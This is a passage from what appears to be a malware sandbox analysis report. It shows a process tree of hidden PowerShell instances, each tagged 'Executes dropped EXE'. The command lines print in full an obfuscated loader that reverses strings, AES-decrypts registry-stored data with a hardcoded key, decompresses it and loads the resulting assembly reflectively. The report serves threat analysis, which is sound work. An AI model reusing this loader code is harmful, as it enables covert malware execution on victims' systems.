-join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        6⤵
        Executes dropped EXE
        
        PID:4064
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5912).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        6⤵
        Executes dropped EXE
        
        PID:7164
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5912).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        6⤵
        Executes dropped EXE
        
        PID:1460
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5912).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, 